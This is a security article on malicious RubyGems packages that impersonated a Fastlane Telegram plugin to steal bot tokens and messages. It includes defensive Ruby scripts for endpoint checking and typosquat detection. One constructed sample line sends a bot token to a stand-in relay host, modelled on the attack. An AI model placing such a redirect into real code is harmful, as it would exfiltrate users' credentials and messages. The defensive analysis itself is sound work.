
Two malicious RubyGems packages have been discovered masquerading as popular Fastlane CI/CD plugins, designed to intercept and exfiltrate Telegram API data. The packages, identified as `fastlane-plugin-telegram-plus` and `fastlane-plugin-telegram_pro`, were found redirecting API requests to attacker-controlled servers, compromising bot tokens and message content [1]. This incident coincides with Vietnam's Telegram ban, suggesting targeted exploitation of developers in the region.
Technical Analysis of the Attack
The malicious packages were uploaded to RubyGems by threat actor Bùi Nam, who configured them to proxy Telegram API requests through intermediary servers [1]. When developers integrated these gems into their Fastlane workflows, the packages would:
- Intercept `sendMessage` API calls to Telegram's official endpoint (`api.telegram.org`)
- Redirect traffic to domains controlled by the attacker
- Log sensitive data including bot tokens, chat IDs, and message content
Security researchers identified the packages as mimicking the legitimate `fastlane-plugin-telegram` (version 0.1.4), which has not been updated since January 2022 [5]. The malicious versions added obfuscated code to the `TelegramAction` class, modifying the API endpoint through environment variable injection.
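The endpoint swap described above is the point at which a bot token leaves the pipeline, so it is also the natural place for a defensive check. The following Ruby guard is an added example, not code from the article or from the fastlane-plugin-telegram project: it builds the `sendMessage` URL the way a plugin might, honouring an environment override (the variable name `TELEGRAM_API_BASE` is an assumption), and refuses to proceed unless the host is exactly `api.telegram.org` over HTTPS. All sample values are constructed.

```ruby
require "uri"

# Added example, not taken from the article or the fastlane-plugin-telegram
# project. It guards the endpoint a CI action is about to send a bot token to,
# which is the value the malicious gems are described as redirecting.
TELEGRAM_API_HOST = "api.telegram.org".freeze
# Hypothetical override variable, assumed for illustration only.
ENDPOINT_ENV_VAR = "TELEGRAM_API_BASE".freeze

# Build the sendMessage URL the way a plugin might, honouring an environment
# override. The env hash is a parameter so the check can run offline.
def telegram_send_message_url(token, env = ENV)
  base = env.fetch(ENDPOINT_ENV_VAR, "https://#{TELEGRAM_API_HOST}")
  "#{base.chomp('/')}/bot#{token}/sendMessage"
end

# True only for an HTTPS URL whose host is exactly api.telegram.org.
# A look-alike such as api.telegram.org.example.net fails the equality test.
def official_telegram_endpoint?(url)
  uri = URI.parse(url)
  uri.is_a?(URI::HTTPS) && uri.host == TELEGRAM_API_HOST
rescue URI::InvalidURIError
  false
end

# Resolve the URL and refuse to hand the token to any other host. The token is
# redacted from the error so it does not end up in CI logs.
def guarded_send_message_url(token, env = ENV)
  url = telegram_send_message_url(token, env)
  unless official_telegram_endpoint?(url)
    raise SecurityError, "refusing to send Telegram bot token to #{url.sub(token, '<redacted>')}"
  end
  url
end

if __FILE__ == $PROGRAM_NAME
  token = "000000:CONSTRUCTED_SAMPLE_TOKEN" # constructed, not a real token
  puts guarded_send_message_url(token, {})
  begin
    guarded_send_message_url(token, { ENDPOINT_ENV_VAR => "https://telegram-relay.example.invalid" })
  rescue SecurityError => e
    puts "blocked: #{e.message}"
  end
end
```

The check compares the parsed host for equality rather than using a substring or prefix test, so a relay named after Telegram's domain is still rejected, and it raises rather than silently falling back to the official endpoint so that a tampered configuration is visible in the build log.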
Broader Context of Telegram API Abuse
This incident follows a pattern of Telegram API exploitation observed since 2024. In July 2024, Forcepoint documented phishing campaigns using Telegram's API to exfiltrate credentials via JavaScript-injected login pages [2]. Attackers logged victim data including email, password, IP addresses, and `userAgent` strings through Telegram bot APIs.
Similar tactics were observed in PyPI packages (`Quicolor`, `QuickColors`, `ColorYi`) that stole Telegram Desktop's `tdata` folder, containing session tokens capable of bypassing two-factor authentication [3]. These stolen accounts were later sold on dark web marketplaces for $5-$400, depending on account privileges and Telegram Stars currency balances.
Detection and Mitigation Strategies
Organizations using Fastlane with Telegram integration should immediately:
- Verify installed packages against the official RubyGems repository
- Check for unexpected network connections to non-Telegram domains
- Rotate all Telegram bot tokens that may have been exposed
- Monitor for unauthorized API calls using Telegram’s “Active Sessions” feature
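The first two steps can be started from text that is already in the repository, without installing anything. The script below is an added example, not code from the article or from any of the projects it names: it lists the gems pinned in a `Gemfile.lock`, flags names that are near misses of the legitimate `fastlane-plugin-telegram` (within a small edit distance, or the legitimate name with a suffix appended), and lists hostnames referenced in a gem's source that are not on an allowlist. The lock file fragment and source fragment are constructed sample input, with placeholder versions.

```ruby
# Added example, not from the article or any of the projects it names. It
# implements the first two mitigation steps above as offline text checks:
# spotting near-miss plugin names in a Gemfile.lock and listing hosts that a
# gem's source contacts beyond an allowlist. All sample input is constructed.
LEGITIMATE_PLUGIN = "fastlane-plugin-telegram".freeze
ALLOWED_HOSTS = %w[api.telegram.org rubygems.org].freeze

# Constructed Gemfile.lock fragment; versions here are placeholders.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      fastlane (0.0.0)
      fastlane-plugin-telegram (0.1.4)
      fastlane-plugin-telegram-plus (0.0.0)
      fastlane-plugin-telegram_pro (0.0.0)
      xcodeproj (0.0.0)
LOCK

# Constructed source fragment modelled on the endpoint swap described above.
SAMPLE_SOURCE = <<~'SRC'
  base = ENV["TELEGRAM_API_BASE"] || "https://api.telegram.org"
  relay = "https://telegram-relay.example.invalid"
  uri = URI("#{relay}/bot#{token}/sendMessage")
SRC

# Gem names from the "specs:" section of a Gemfile.lock: the lines indented by
# exactly four spaces of the form "name (version)". Dependency lines are
# indented by six and are skipped.
def locked_gem_names(lock_text)
  lock_text.scan(/^ {4}([^\s(]+) \(/).flatten.uniq
end

# Levenshtein edit distance, used to spot near-miss names.
def edit_distance(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca == cb ? 0 : 1)].min
    end
    prev = cur
  end
  prev[b.length]
end

# Names that resemble the legitimate plugin but are not it: either within a
# small edit distance, or the legitimate name with something appended
# (the "-plus" / "_pro" pattern described above).
def suspicious_gem_names(lock_text, legitimate = LEGITIMATE_PLUGIN, max_distance: 3)
  locked_gem_names(lock_text).reject { |n| n == legitimate }.select do |name|
    name.start_with?(legitimate) || edit_distance(name, legitimate) <= max_distance
  end
end

# Hostnames referenced by URL in gem source that are not on the allowlist.
def unexpected_hosts(source_text, allowed = ALLOWED_HOSTS)
  hosts = source_text.scan(%r{https?://([a-z0-9.-]+\.[a-z]{2,})}i).flatten.map(&:downcase).uniq
  hosts - allowed
end

if __FILE__ == $PROGRAM_NAME
  puts "suspicious gem names: #{suspicious_gem_names(SAMPLE_LOCK).inspect}"
  puts "unexpected hosts:     #{unexpected_hosts(SAMPLE_SOURCE).inspect}"
end
```

Run it against a real `Gemfile.lock` by passing `File.read("Gemfile.lock")` to `suspicious_gem_names`, and against an installed gem's `lib/` files with `unexpected_hosts`; a hit from either is a prompt to inspect the gem by hand and, per the third step above, to rotate any token the pipeline has used.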
RubyGems has since removed the malicious packages, but developers should remain vigilant for similar typosquatting attempts. The legitimate `fastlane-plugin-telegram` remains safe to use, though developers should consider auditing its source code given its age [5].
Security Implications
This attack demonstrates how CI/CD toolchains can become vectors for supply chain compromises. The incident shares characteristics with previous attacks against the PyPI and npm ecosystems:

| Platform | Attack Method | Data Targeted |
|---|---|---|
| RubyGems | Typosquatting legitimate Fastlane plugins | Telegram API credentials |
| PyPI | Malicious color utility packages | Telegram session tokens |
| npm | Compromised maintainer accounts | Environment variables |
The incident underscores the need for robust package verification processes in development workflows, particularly when handling sensitive API credentials.
Conclusion
This RubyGems campaign represents a targeted attack against developers using Telegram’s API through Fastlane. While the immediate threat has been mitigated through package removal, the techniques used suggest ongoing risks to CI/CD pipelines. Organizations should implement strict controls over third-party dependencies and monitor for anomalous API activity, particularly when using services like Telegram that handle sensitive communications.
References
1. “Malicious RubyGems Pose as Fastlane to Steal Telegram API Data”, BleepingComputer, June 3, 2025.
2. “Threat Actors Harvesting Credentials via Telegram API”, Forcepoint, July 22, 2024.
3. “From PyPI to the Dark Marketplace: How a Malicious Package Fuels Sale of Telegram Identities”, Imperva, April 16, 2025.
4. “Phishing Malware Using Telegram API”, ASEC (AhnLab), February 20, 2024.
5. “fastlane-plugin-telegram”, RubyGems, January 27, 2022.
6. “Smart Robot Security Research”, Securelist, February 27, 2024.
7. “Malicious Apps”, Zimperium.